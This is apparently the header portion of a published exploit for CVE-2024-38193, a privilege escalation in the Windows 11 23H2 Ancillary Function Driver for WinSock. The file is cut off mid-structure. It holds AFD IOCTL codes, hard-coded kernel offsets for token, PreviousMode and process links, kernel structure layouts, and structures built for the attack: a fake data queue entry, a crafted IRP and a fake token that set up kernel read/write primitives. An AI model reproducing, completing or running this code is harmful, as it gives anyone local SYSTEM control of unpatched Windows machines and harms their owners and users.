# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation # Date: 2025-05-05 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Tested on: Win x64 # CVE : CVE-2024-38193 #pragma once #include "ntstatus.h" #include "Windows.h" #include #pragma comment(lib, "ntdll.lib") #define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF)) #define LODWORD(l) ((DWORD)((DWORDLONG)(l))) #define AfdOpenPacket "AfdOpenPacketXX" #define AFD_DEVICE_NAME L"\\Device\\Afd" #define LOCALHOST "127.0.0.1" #define IOCTL_AFD_BIND 0x12003LL #define IOCTL_AFD_LISTEN 0x1200BLL #define IOCTL_AFD_CONNECT 0x120BBLL #define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL #define FSCTL_PIPE_PEEK 0x11400CLL #define FSCTL_PIPE_IMPERSONATE 0x11001CLL #define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8 #define OBJ_CASE_INSENSITIVE 0x00000040 #define OBJ_INHERIT 0x00000002 #define FILE_OPEN_IF 0x3 #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) #define OFFSET_IN_TOKEN_VARIABLEPART 0x490 #define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40 #define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8 #define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0 #define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8 #define PREVIOUS_MODE_OFFSET 0x232 #define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448 #define OFFSET_TO_TOKEN 0x4b8 #define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE typedef struct IO_STATUS_BLOCK { union { DWORD Status; PVOID Pointer; }; DWORD* Information; }; //0x4 bytes (sizeof) struct _SYSTEM_POWER_STATE_CONTEXT { union { struct { ULONG Reserved1 : 8; //0x0 ULONG TargetSystemState : 4; //0x0 ULONG EffectiveSystemState : 4; //0x0 ULONG CurrentSystemState : 4; //0x0 ULONG IgnoreHibernationPath : 1; //0x0 ULONG PseudoTransition : 1; //0x0 ULONG KernelSoftReboot : 1; //0x0 ULONG DirectedDripsTransition : 1; //0x0 ULONG Reserved2 : 8; //0x0 }; ULONG ContextAsUlong; //0x0 }; }; //0x4 bytes (sizeof) union _POWER_STATE { enum _SYSTEM_POWER_STATE SystemState; //0x0 enum _DEVICE_POWER_STATE DeviceState; //0x0 }; //0x48 bytes (sizeof) typedef struct _IO_STACK_LOCATION { UCHAR MajorFunction; //0x0 UCHAR MinorFunction; //0x1 UCHAR Flags; //0x2 UCHAR Control; //0x3 union { struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT FileAttributes; //0x18 USHORT ShareAccess; //0x1a ULONG EaLength; //0x20 } Create; //0x8 struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT Reserved; //0x18 USHORT ShareAccess; //0x1a struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20 } CreatePipe; //0x8 struct { struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8 ULONG Options; //0x10 USHORT Reserved; //0x18 USHORT ShareAccess; //0x1a struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20 } CreateMailslot; //0x8 struct { ULONG Length; //0x8 ULONG Key; //0x10 ULONG Flags; //0x14 union _LARGE_INTEGER ByteOffset; //0x18 } Read; //0x8 struct { ULONG Length; //0x8 ULONG Key; //0x10 ULONG Flags; //0x14 union _LARGE_INTEGER ByteOffset; //0x18 } Write; //0x8 struct { ULONG Length; //0x8 struct _UNICODE_STRING* FileName; //0x10 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18 ULONG FileIndex; //0x20 } QueryDirectory; //0x8 struct { ULONG Length; //0x8 ULONG CompletionFilter; //0x10 } NotifyDirectory; //0x8 struct { ULONG Length; //0x8 ULONG CompletionFilter; //0x10 enum _DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass; //0x18 } NotifyDirectoryEx; //0x8 struct { ULONG Length; //0x8 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10 } QueryFile; //0x8 struct { ULONG Length; //0x8 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10 struct _FILE_OBJECT* FileObject; //0x18 union { struct { UCHAR ReplaceIfExists; //0x20 UCHAR AdvanceOnly; //0x21 }; ULONG ClusterCount; //0x20 VOID* DeleteHandle; //0x20 }; } SetFile; //0x8 struct { ULONG Length; //0x8 VOID* EaList; //0x10 ULONG EaListLength; //0x18 ULONG EaIndex; //0x20 } QueryEa; //0x8 struct { ULONG Length; //0x8 } SetEa; //0x8 struct { ULONG Length; //0x8 enum _FSINFOCLASS FsInformationClass; //0x10 } QueryVolume; //0x8 struct { ULONG Length; //0x8 enum _FSINFOCLASS FsInformationClass; //0x10 } SetVolume; //0x8 struct { ULONG OutputBufferLength; //0x8 ULONG InputBufferLength; //0x10 ULONG FsControlCode; //0x18 VOID* Type3InputBuffer; //0x20 } FileSystemControl; //0x8 struct { union _LARGE_INTEGER* Length; //0x8 ULONG Key; //0x10 union _LARGE_INTEGER ByteOffset; //0x18 } LockControl; //0x8 struct { ULONG OutputBufferLength; //0x8 ULONG InputBufferLength; //0x10 ULONG IoControlCode; //0x18 VOID* Type3InputBuffer; //0x20 } DeviceIoControl; //0x8 struct { ULONG SecurityInformation; //0x8 ULONG Length; //0x10 } QuerySecurity; //0x8 struct { ULONG SecurityInformation; //0x8 VOID* SecurityDescriptor; //0x10 } SetSecurity; //0x8 struct { struct _VPB* Vpb; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x10 } MountVolume; //0x8 struct { struct _VPB* Vpb; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x10 } VerifyVolume; //0x8 struct { struct _SCSI_REQUEST_BLOCK* Srb; //0x8 } Scsi; //0x8 struct { ULONG Length; //0x8 VOID* StartSid; //0x10 struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18 ULONG SidListLength; //0x20 } QueryQuota; //0x8 struct { ULONG Length; //0x8 } SetQuota; //0x8 struct { enum _DEVICE_RELATION_TYPE Type; //0x8 } QueryDeviceRelations; //0x8 struct { struct _GUID* InterfaceType; //0x8 USHORT Size; //0x10 USHORT Version; //0x12 struct _INTERFACE* Interface; //0x18 VOID* InterfaceSpecificData; //0x20 } QueryInterface; //0x8 struct { struct _DEVICE_CAPABILITIES* Capabilities; //0x8 } DeviceCapabilities; //0x8 struct { struct _IO_RESOURCE_REQUIREMENTS_LIST* IoResourceRequirementList; //0x8 } FilterResourceRequirements; //0x8 struct { ULONG WhichSpace; //0x8 VOID* Buffer; //0x10 ULONG Offset; //0x18 ULONG Length; //0x20 } ReadWriteConfig; //0x8 struct { UCHAR Lock; //0x8 } SetLock; //0x8 struct { enum BUS_QUERY_ID_TYPE IdType; //0x8 } QueryId; //0x8 struct { enum DEVICE_TEXT_TYPE DeviceTextType; //0x8 ULONG LocaleId; //0x10 } QueryDeviceText; //0x8 struct { UCHAR InPath; //0x8 UCHAR Reserved[3]; //0x9 enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10 } UsageNotification; //0x8 struct { enum _SYSTEM_POWER_STATE PowerState; //0x8 } WaitWake; //0x8 struct { struct _POWER_SEQUENCE* PowerSequence; //0x8 } PowerSequence; //0x8 struct { union { ULONG SystemContext; //0x8 struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext; //0x8 }; enum _POWER_STATE_TYPE Type; //0x10 union _POWER_STATE State; //0x18 enum POWER_ACTION ShutdownType; //0x20 } Power; //0x8 struct { struct _CM_RESOURCE_LIST* AllocatedResources; //0x8 struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10 } StartDevice; //0x8 struct { ULONGLONG ProviderId; //0x8 VOID* DataPath; //0x10 ULONG BufferSize; //0x18 VOID* Buffer; //0x20 } WMI; //0x8 struct { VOID* Argument1; //0x8 VOID* Argument2; //0x10 VOID* Argument3; //0x18 VOID* Argument4; //0x20 } Others; //0x8 } Parameters; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x28 struct _FILE_OBJECT* FileObject; //0x30 LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2, VOID* arg3); //0x38 VOID* Context; //0x40 }IO_STACK_LOCATION; //0x18 bytes (sizeof) struct _KDEVICE_QUEUE_ENTRY { struct _LIST_ENTRY DeviceListEntry; //0x0 ULONG SortKey; //0x10 UCHAR Inserted; //0x14 }; //0x58 bytes (sizeof) struct _KAPC { UCHAR Type; //0x0 UCHAR AllFlags; //0x1 UCHAR Size; //0x2 UCHAR SpareByte1; //0x3 ULONG SpareLong0; //0x4 struct _KTHREAD* Thread; //0x8 struct _LIST_ENTRY ApcListEntry; //0x10 VOID* Reserved[3]; //0x20 VOID* NormalContext; //0x38 VOID* SystemArgument1; //0x40 VOID* SystemArgument2; //0x48 CHAR ApcStateIndex; //0x50 CHAR ApcMode; //0x51 UCHAR Inserted; //0x52 }; //0xd0 bytes (sizeof) struct _IRP { SHORT Type; //0x0 USHORT Size; //0x2 USHORT AllocationProcessorNumber; //0x4 USHORT Reserved; //0x6 struct _MDL* MdlAddress; //0x8 ULONG Flags; //0x10 union { struct _IRP* MasterIrp; //0x18 LONG IrpCount; //0x18 VOID* SystemBuffer; //0x18 } AssociatedIrp; //0x18 struct _LIST_ENTRY ThreadListEntry; //0x20 struct IO_STATUS_BLOCK IoStatus; //0x30 CHAR RequestorMode; //0x40 UCHAR PendingReturned; //0x41 CHAR StackCount; //0x42 CHAR CurrentLocation; //0x43 UCHAR Cancel; //0x44 UCHAR CancelIrql; //0x45 CHAR ApcEnvironment; //0x46 UCHAR AllocationFlags; //0x47 union { struct _IO_STATUS_BLOCK* UserIosb; //0x48 VOID* IoRingContext; //0x48 }; struct _KEVENT* UserEvent; //0x50 union { struct { union { VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK* arg2, ULONG arg3); //0x58 VOID* IssuingProcess; //0x58 }; union { VOID* UserApcContext; //0x60 struct _IORING_OBJECT* IoRing; //0x60 }; } AsynchronousParameters; //0x58 union _LARGE_INTEGER AllocationSize; //0x58 } Overlay; //0x58 VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x68 VOID* UserBuffer; //0x70 union { struct { union { struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78 VOID* DriverContext[4]; //0x78 }; struct _ETHREAD* Thread; //0x98 CHAR* AuxiliaryBuffer; //0xa0 struct _LIST_ENTRY ListEntry; //0xa8 union { struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8 ULONG PacketType; //0xb8 }; struct _FILE_OBJECT* OriginalFileObject; //0xc0 VOID* IrpExtension; //0xc8 } Overlay; //0x78 struct _KAPC Apc; //0x78 VOID* CompletionKey; //0x78 } Tail; //0x78 }; typedef struct _TA_ADDRESS { USHORT AddressLength; USHORT AddressType; UCHAR Address[1]; }TA_ADDRESS; typedef struct _TRANSPORT_ADDRESS { LONG TAAddressCount; TA_ADDRESS Address[1]; }TRANSPORT_ADDRESS; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; }OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef struct _SYSTEM_MODULE_ENTRY { HANDLE Section; PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[256]; } SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { PVOID Object; ULONG_PTR UniqueProcessId; ULONG_PTR HandleValue; ULONG GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved; } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; typedef struct _SYSTEM_HANDLE_INFORMATION_EX { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; typedef struct _AFD_CREATE_PACKET { //FILE_FULL_EA_INFORMATION ULONG NextEntryOffset; WORD Flags; UCHAR EaNameLength; USHORT EaValueLength; CHAR EaName[15]; //AFD_CREATE_PACKET ULONG EndpointFlags; ULONG GroupID; ULONG AddressFamily; ULONG SocketType; ULONG Protocol; ULONG SizeOfTransportName; wchar_t TransportName[16]; //UCHAR Unkown; } AFD_CREATE_PACKET; enum THREADINFOCLASS { ThreadImpersonationToken = 5 }; enum SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemExtendedHandleInformation = 64 }; typedef enum EVENT_TYPE { NotificationEvent, SynchronizationEvent }; typedef struct _AFD_BIND_DATA { ULONG ShareType; SOCKADDR_IN addr; } AFD_BIND_DATA, * PAFD_BIND_DATA; typedef struct alignas(16) MY_AFD_CONNECT_INFO { __int64 UseSan; __int64 hNtSock1; __int64 Unknown; __int32 tmp6; WORD const_16; sockaddr_in bind; }; typedef struct FAKE_DATA_ENTRY_QUEUE { DWORD tmp; LIST_ENTRY nextQueue; __int64 unknown; PVOID security_client_context; __int64 unknown2; __int64 sizeOfData; char DATA[0x77FD0]; }; typedef struct _AFD_LISTEN_INFO { ULONG unknown; __int64 MaximumConnectionQueue; } AFD_LISTEN_INFO, * PAFD_LISTEN_INFO; typedef struct _SECURITY_CLIENT_CONTEXT { _SECURITY_QUALITY_OF_SERVICE SecurityQos; void* ClientToken; unsigned __int8 DirectlyAccessClientToken; unsigned __int8 DirectAccessEffectiveOnly; unsigned __int8 ServerIsRemote; _TOKEN_CONTROL ClientTokenControl; }SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT; struct __declspec(align(8)) _OWNER_ENTRY { unsigned __int64 OwnerThread; DWORD ___u1; }; //0x68 bytes (sizeof) typedef struct _ERESOURCE { struct _LIST_ENTRY SystemResourcesList; //0x0 struct _OWNER_ENTRY* OwnerTable; //0x10 SHORT ActiveCount; //0x18 union { USHORT Flag; //0x1a struct { UCHAR ReservedLowFlags; //0x1a UCHAR WaiterPriority; //0x1b }; }; VOID* SharedWaiters; //0x20 VOID* ExclusiveWaiters; //0x28 struct _OWNER_ENTRY OwnerEntry; //0x30 ULONG ActiveEntries; //0x40 ULONG ContentionCount; //0x44 ULONG NumberOfSharedWaiters; //0x48 ULONG NumberOfExclusiveWaiters; //0x4c VOID* Reserved2; //0x50 union { VOID* Address; //0x58 ULONGLONG CreatorBackTraceIndex; //0x58 }; ULONGLONG SpinLock; //0x60 }ERESOURCE, *PERESOURCE; //0x8 bytes (sizeof) typedef struct _EX_PUSH_LOCK { union { struct { ULONGLONG Locked : 1; //0x0 ULONGLONG Waiting : 1; //0x0 ULONGLONG Waking : 1; //0x0 ULONGLONG MultipleShared : 1; //0x0 ULONGLONG Shared : 60; //0x0 }; ULONGLONG Value; //0x0 VOID* Ptr; //0x0 }; }; //0x10 bytes (sizeof) typedef struct _SEP_CACHED_HANDLES_TABLE { struct _EX_PUSH_LOCK Lock; //0x0 struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8 }; //0x8 bytes (sizeof) typedef struct _EX_RUNDOWN_REF { union { ULONGLONG Count; //0x0 VOID* Ptr; //0x0 }; }; //0x20 bytes (sizeof) typedef struct _OB_HANDLE_REVOCATION_BLOCK { struct _LIST_ENTRY RevocationInfos; //0x0 struct _EX_PUSH_LOCK Lock; //0x10 struct _EX_RUNDOWN_REF Rundown; //0x18 }; //0xc0 bytes (sizeof) typedef struct _SEP_LOGON_SESSION_REFERENCES { struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0 struct _LUID LogonId; //0x8 struct _LUID BuddyLogonId; //0x10 LONGLONG ReferenceCount; //0x18 ULONG Flags; //0x20 struct _DEVICE_MAP* pDeviceMap; //0x28 VOID* Token; //0x30 struct _UNICODE_STRING AccountName; //0x38 struct _UNICODE_STRING AuthorityName; //0x48 struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58 struct _EX_PUSH_LOCK SharedDataLock; //0x68 struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes; //0x70 struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78 struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80 struct _EJOB* ServerSilo; //0xa0 struct _LUID SiblingAuthId; //0xa8 struct _LIST_ENTRY TokenList; //0xb0 }; //0x30 bytes (sizeof) typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION { ULONG SecurityAttributeCount; //0x0 struct _LIST_ENTRY SecurityAttributesList; //0x8 ULONG WorkingSecurityAttributeCount; //0x18 struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20 }AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION; //0x20 bytes (sizeof) typedef struct _SEP_SID_VALUES_BLOCK { ULONG BlockLength; //0x0 LONGLONG ReferenceCount; //0x8 ULONG SidCount; //0x10 ULONGLONG SidValuesStart; //0x18 }SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK; //0x18 bytes (sizeof) struct _SEP_TOKEN_PRIVILEGES { ULONGLONG Present; //0x0 ULONGLONG Enabled; //0x8 ULONGLONG EnabledByDefault; //0x10 }; //0x1f bytes (sizeof) struct _SEP_AUDIT_POLICY { struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0 UCHAR PolicySetStatus; //0x1e }; //0x498 bytes (sizeof) struct _TOKEN { struct _TOKEN_SOURCE TokenSource; //0x0 struct _LUID TokenId; //0x10 struct _LUID AuthenticationId; //0x18 struct _LUID ParentTokenId; //0x20 union _LARGE_INTEGER ExpirationTime; //0x28 struct _ERESOURCE* TokenLock; //0x30 struct _LUID ModifiedId; //0x38 struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40 struct _SEP_AUDIT_POLICY AuditPolicy; //0x58 ULONG SessionId; //0x78 ULONG UserAndGroupCount; //0x7c ULONG RestrictedSidCount; //0x80 ULONG VariableLength; //0x84 ULONG DynamicCharged; //0x88 ULONG DynamicAvailable; //0x8c ULONG DefaultOwnerIndex; //0x90 struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98 struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0 VOID* PrimaryGroup; //0xa8 ULONG* DynamicPart; //0xb0 struct _ACL* DefaultDacl; //0xb8 enum _TOKEN_TYPE TokenType; //0xc0 enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4 ULONG TokenFlags; //0xc8 UCHAR TokenInUse; //0xcc ULONG IntegrityLevelIndex; //0xd0 ULONG MandatoryPolicy; //0xd4 void* LogonSession; //0xd8 struct _LUID OriginatingLogonSession; //0xe0 struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8 struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8 struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; //0x308 VOID* Package; //0x310 struct _SID_AND_ATTRIBUTES* Capabilities; //0x318 ULONG CapabilityCount; //0x320 struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328 struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438 struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440 struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes; //0x448 VOID* TrustLevelSid; //0x450 struct _TOKEN* TrustLinkedToken; //0x458 VOID* IntegrityLevelSidValue; //0x460 struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468 struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470 struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478 struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480 VOID* SessionObject; //0x488 ULONGLONG VariablePart; //0x490 }; //0x38 bytes (sizeof) struct _OBJECT_HEADER { LONGLONG PointerCount; //0x0 union { LONGLONG HandleCount; //0x8 VOID* NextToFree; //0x8 }; struct _EX_PUSH_LOCK Lock; //0x10 UCHAR TypeIndex; //0x18 union { UCHAR TraceFlags; //0x19 struct { UCHAR DbgRefTrace : 1; //0x19 UCHAR DbgTracePermanent : 1; //0x19 }; }; UCHAR InfoMask; //0x1a union { UCHAR Flags; //0x1b struct { UCHAR NewObject : 1; //0x1b UCHAR KernelObject : 1; //0x1b UCHAR KernelOnlyAccess : 1; //0x1b UCHAR ExclusiveObject : 1; //0x1b UCHAR PermanentObject : 1; //0x1b UCHAR DefaultSecurityQuota : 1; //0x1b UCHAR SingleHandleEntry : 1; //0x1b UCHAR DeletedInline : 1; //0x1b }; }; ULONG Reserved; //0x1c union { struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20 VOID* QuotaBlockCharged; //0x20 }; VOID* SecurityDescriptor; //0x28 struct _TOKEN Body; //0x30 }; struct mm { void* fake_data_entry; void* input; _IRP* crafted_irp; IO_STACK_LOCATION *crafted_arbitrary_io_stack_location; void* p_mem_0x30; void* p_mem_0xD0_2; _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; ACL* VariablePartDefaultDacl; ACL* VariablePartDefaultDacl2; _ERESOURCE* TokenLock; void* PrimaryGroup; int sizeOfClientTokenAndObjectHeader; PSEP_SID_VALUES_BLOCK TokenSidValues; _SECURITY_CLIENT_CONTEXT* security_client_context; _SEP_LOGON_SESSION_REFERENCES* LogonSession; _TOKEN* fakeToken; void *pipe_100_im_control_block; void* pipe_100_rw_control_block; void* p_mem_Pipe_hToPipe_1000_rw; void* p_mem_Pipe_hToPipe_1000_rw_2; HANDLE hPipeIM; HANDLE hPipeRW; HANDLE hFileIM; HANDLE hFileRW; HANDLE IncPrimitiveTOKEN; HANDLE RWPrimitiveTOKEN; }; //0x18 bytes (sizeof) struct _DISPATCHER_HEADER { union { volatile LONG Lock; //0x0 LONG LockNV; //0x0 struct { UCHAR Type; //0x0 UCHAR Signalling; //0x1 UCHAR Size; //0x2 UCHAR Reserved1; //0x3 }; struct { UCHAR TimerType; //0x0 union { UCHAR TimerControlFlags; //0x1 struct { UCHAR Absolute : 1;